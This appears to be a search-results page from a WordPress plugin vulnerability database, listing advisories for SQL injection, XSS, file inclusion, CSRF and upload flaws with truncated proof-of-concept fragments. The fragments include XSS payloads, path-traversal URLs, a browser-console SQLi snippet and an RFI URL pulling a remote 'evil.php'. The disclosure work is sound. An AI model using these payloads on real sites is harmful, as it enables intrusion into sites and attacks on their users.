4359 matches found
WP Review Slider < 12.2 - Subscriber+ SQLi
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. Run the following code in the browser console on any WP Admin page. fetch'/wp-admin/admin-ajax.php', method: 'POST',...
WP Reactions Lite < 1.3.6 - Authenticated Stored Cross Site Scripting
The plugin does not properly sanitize inputs within wp-admin pages, allowing users with sufficient access to inject XSS payloads within /wp-admin/ pages. Open Global Activation and Click on Customize Now On Step3 StylingTab Enter the XSS payload into "Whats your reaction" field Payload Used :...
Stop Spammers Security < 2021.18 - Authenticated Stored XSS
The plugin does not escape some of its settings, allowing high privilege users such as admin to set Cross-Site Scripting payloads in them even when the unfilteredhtml capability is disallowed Put the following payload in any of the API field of the Web Services settings: " autofocus...
JH 404 Logger <= 1.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
The plugin doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. curl 'https://example.com/non-existing-page"' -e '"'...
GeoDirectory < 2.2.24 - Admin+ SQLi
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. POST /wp-admin/admin-ajax.php HTTP/1.1...
Weather Effect < 1.3.6 - Admin+ Stored Cross-Site Scripting
The plugin does not properly validate and escape some of its settings like sizeleaf, flakesleaf, speed which could lead to Stored Cross-Site Scripting issues POST /wp-admin/admin.php?page=weather-effects-setting HTTP/1.1 Accept: text/html, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding...
Docket Cache < 21.08.02 - Reflected Cross-Site Scripting
The plugin does not escape some filter parameters when the OPCache Viewer is enabled before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/admin.php?page=docket-cache-opcviewer&idx=opcviewer&s=a&sf="alert/XSS-sf/&sm="alert/XSS-sm/...
Stripe Payment Gateway for WooCommerce < 3.6.0 - Reflected Cross-Site Scripting (XSS)
The plugin did not sanitise or escape the page parameter before outputting back in an attribute, leading to a reflected Cross-Site Scripting issue alert/XSS/"' /...
WordPress Download Manager < 3.1.18 - Unauthorised Download Duplication
The duplicate method, hooked to the admininit action did not have any CSRF and authorisation checks, allowing unauthorised users such as unauthenticated ones to duplicate arbitrary downloads As an unauthenticated or authenticated user, open the following URL to duplicate the Download with id 717...
Blog2Social < 6.9.10 - Subscriber+ SQLi
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers Run the script below in the web browser console while being logged in as a subscriber and on the Blog2Social...
Print-O-Matic < 2.0.3 - Admin+ Stored Cross-Site Scripting
The plugin does not escape some of its settings before outputting them in attribute, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. Put the following payload in the "Pause Before Print" settings of the plugin: ...
WP Header Images < 2.0.1 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the t parameter before outputting it back in the plugin's settings page, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/options-general.php?page=wphi&t=5"alert/XSS/...
Sociable <= 4.3.4.1 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise or escape some of its settings before outputting them in the admins dashboard, allowing high privilege users to perform Cross-Site Scripting attacks against other users even when the unfilteredhtml capability is disallowed Put the following payload in the "Background...
YITH WooCommerce Product Add-Ons < 2.1.0 - Authenticated Local File Inclusion
The plugin does not validate user input before using it to generate a local path passed to include, which could lead to a Local File Inclusion issue on Windows Web Servers https://example.com/wp-admin/admin.php?page=yithwapopanel&tab=blocks&blockid=1&addonid=1&addontype=html%2F..%2Fhello...
Prismatic < 2.8 - Reflected Cross-Site Scripting (XSS)
The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator...
Insert Pages < 3.7.0 - Contributor+ Stored Cross-Site Scripting
The plugin adds a shortcode that prints out other pages' content and custom fields. It can be used by users with a role as low as Contributor to perform Cross-Site Scripting attacks by storing the payload/s in another post's custom fields. - Create a page A - Add a custom field containing JS in...
Storefront Footer Text <= 1.0.1 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitize and escape the "Footer Credit Text" added to pages, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered-html capability is disallowed. The plugin requires the Storefront theme Go to Appearance Customize /wp-admin/customize.ph...
YITH WooCommerce Product Add-Ons < 2.1.0 - Reflected Cross-Site Scripting
The plugin does not escape some parameters before outputting them back in the edit addon page in the admin dashboard, leading to Reflected Cross-Site Scripting issues v alert/XSS-id/&addontype=html"alert/XSS-type/ v 2.1.0...
UsersWP < 1.2.2.29 - Reflected Cross-Site Scripting
The plugin sanitises user input via sanitizetextfield but do not escape it before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues On the reset page made by the plugin: https://example.com/reset/?key=a&login=%22accesskey=X%20onclick=alert1%20b=%22...
WP Customer Reviews < 3.5.6 - Authenticated Stored Cross-Site Scripting (XSS)
The plugin did not sanitise some of its settings, allowing high privilege users such as administrators to set XSS payloads in them which will then be triggered in pages where reviews are enabled 1. Login to WordPress as an Administrator 2. Install and Activate plugin "WP Customer Reviews" 3. Clic...
Related Posts for WordPress < 2.0.4 - Authenticated Reflected Cross-Site Scripting (XSS)
Unvalidated input and lack of output encoding within the plugin lead to a Reflected Cross-Site Scripting XSS vulnerability within the 'lang' GET parameter while editing a post, triggered when users with the capability of editing posts access a malicious URL...
Constant Contact Forms < 1.8.8 - Multiple Authenticated Stored XSS
Multiple stored cross-site scripting vulnerabilities in Constant Contact Forms for WordPress 1.8.7 and lower allow high-privileged user Editor+ to inject arbitrary Javascript code or HTML in posts where the malicious form is embed. High-privileged user Editor+ can exploit XSS via Add New Form's...
Salon booking system < 7.6.3 - Customer+ Bookings/Customers Data Disclosure
The plugin does not have proper authorisation in some of its endpoints, which could allow customers to access all bookings and other customer's data Make a booking to get a customer account Login via API and get access token: curl...
WP Coder < 2.5.2 - RFI leading to RCE via CSRF
The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...
Events Made Easy < 2.2.24 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape Custom Field Names, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Add/Edit a Custom Field /wp-admin/admin.php?page=eme-formfields and put the following payload in the Field Name:...
StreamCast < 2.1.1 - Contributor+ Stored Cross-Site Scripting
The plugin does not sanitise or validate the parameters from its shortcode, allowing users with a role as low as contributor to set Cross-Site Scripting payload in them which will be triggered in the page/s with the embed malicious shortcode Log in as contributor and add the following shortcode i...
Affiliate Power < 2.3.0 - Reflected Cross-Site Scripting
The plugin does not escape the page parameter in its Affiliate Power Sales dashboard before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...
Easy Accordion < 2.0.22 - Authenticated Stored XSS
The plugin does not properly sanitize inputs when adding new items to an accordion. When adding new items to an accordion, an injection payload of "" for an accordion item's title will result in XSS in the wp-admin page as well as on pages that show the accordion...
Tutor LMS < 1.9.6 - Reflected Cross-Site Scripting
The plugin does not escape a page parameter before outputting it back in an student dashboard page, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...
Business Directory Plugin < 5.11 - Arbitrary File Upload to RCE
The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged in administrator import files. As the plugin also did not validate uploaded files, it could lead to RCE. Note WPScanTeam: CSRF check and some file validation were added in v5.11, however a blacklist...
User Registration < 2.2.4.1 - Subscriber+ Arbitrary File Upload
The plugin does not properly restrict the files to be uploaded via an AJAX action available to both unauthenticated and authenticated users, which could allow unauthenticated users to upload PHP files for example. The following Python script automates the exploitation of this plugin by uploading ...
Form Builder CP < 1.2.32 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some of its form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup Create/edit a form and put the following...
Simple Download Monitor < 3.9.5 - Contributor+ Stored Cross-Site Scripting via File Thumbnail
The plugin does not escape the "File Thumbnail" post meta before outputting it in some pages, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks. Given the that XSS is triggered even when the Download is in a review state, contributor could ma...
Game Server Status <= 1.0 - Admin+ Stored Cross-Site Scripting
The plugin does not escape some of the Game Server data, which could allow high privilege users such as admin to perform Cross-Site Scripting even when the unfiletredhtml is disallowed Create/Edit a Game Server and add the following payload as Server name: Test"alert/XSS/...
Live Scores for SportsPress < 1.9.1 - Authenticated Local File Inclusion
The plugin does not validate or sanitise the tab parameter in the admin dashboard before using it in an include statement, leading to an Authenticated Local File Inclusion https://example.com/wp-admin/admin.php?page=live-scores-for-sportspress&tab=../../index This will include the homepage of the...
Qyrr < 0.7 - Authenticated (contributor+) Stored XSS
The plugin does not escape the data-uri of the QR Code when outputting it in a src attribute, allowing for Cross-Site Scripting attacks. Furthermore, the datauritometa AJAX action, available to all authenticated users, only had a CSRF check in place, with the nonce available to users with a role ...
Testimonials Widget < 4.0.0 - Multiple Authenticated Stored XSS
Multiple cross-site scripting vulnerabilities in Testimonials Widget 3.5.1 and lower allow remote attackers to inject arbitrary Javascript code or HTML via the below parameters: - Author - Job Title - Location - Company - Email - URL Successful exploitation of this vulnerability would allow...
Timetable and Event Schedule by MotoPress < 2.3.19 - Author+ Stored Cross-Site Scripting
The plugin does not sanitise some of its parameters, which could allow low privilege users such as author to perform XSS attacks against frontend and backend users when viewing the related event/s Create an event with the following payload in the description of a timeslot: The XSS will be execute...
Mapwiz <= 1.0.1 - Admin+ SQLi
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. POST /wp-admin/admin.php?page=myplug/muyplg.php&mid HTTP/1.1...
Search Logger <= 0.9 - Admin+ SQLi
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users ------------------------------------------------- Go to Search Logger Logs Select Delete ------------------------------------------------...
Simple Download Monitor < 3.9.6 - Arbitrary Thumbnails Removal
The plugin allows users with a role as low as Contributor to remove thumbnails from downloads they do not own, even if they cannot normally edit the download. jQuery.postajaxurl, action: "sdmremovethumbnailimage", postiddel: 613 // not owned by the user POST /wp-admin/admin-ajax.php HTTP/1.1...
Sitewide Notice WP < 2.3 - Authenticated Stored XSS
The plugin does not sanitise some of its settings before outputting them in frontend pages, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Put the following payload in the Message setting of the plugin: alert/XSS/ The XS...
Database Backup for WordPress < 2.4 - Authenticated Persistent Cross-Site Scripting (XSS)
The plugin did not escape the backuprecipient POST parameter in before output it back in the attribute of an HTML tag, leading to a Stored Cross-Site Scripting issue. POST /wp-admin/tools.php?page=wp-db-backup HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type:...
Sassy Social Share < 3.3.45 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. Insert the...
OAuth Single Sign On - SSO (OAuth Client) < 6.24.2 - IdP Discard via CSRF
The plugin does not have CSRF checks when discarding Identify providers IdP, which could allow attackers to make logged in admins delete all IdP via a CSRF attack Make a logged in admin open: https://example.com/wp-admin/admin.php?page=mooauthsettings&tab=config&action=discard...
BP Better Messages < 1.9.9.41 - Multiple CSRF
The plugin does not check for CSRF in multiple of its AJAX actions: bpbettermessagesleavechat, bpbettermessagesjoinchat, bpmessagesleavethread, bpmessagesmutethread, bpmessagesunmutethread, bpbettermessagesaddusertothread, bpbettermessagesexcludeuserfromthread. This could allow attackers to make...
WP Table Builder < 1.3.10 - Reflected Cross-Site Scripting
The plugin does not escape a page parameter before outputting it back in an admin dashboard page, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...
Gutenberg PDF Viewer Block < 1.0.1 - Contributor+ Stored Cross-Site Scripting
The plugin does not sanitise and escape its block, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks...
POST SMTP Mailer < 2.8.8 - Authorization Bypass via type connect-app API
Description The plugin is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to...
My Calendar < 3.2.18 - Subscriber+ Reflected Cross-Site Scripting
The plugin does not sanitise and escape the callback parameter of the mcpostlookup AJAX action available to any authenticated user before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue...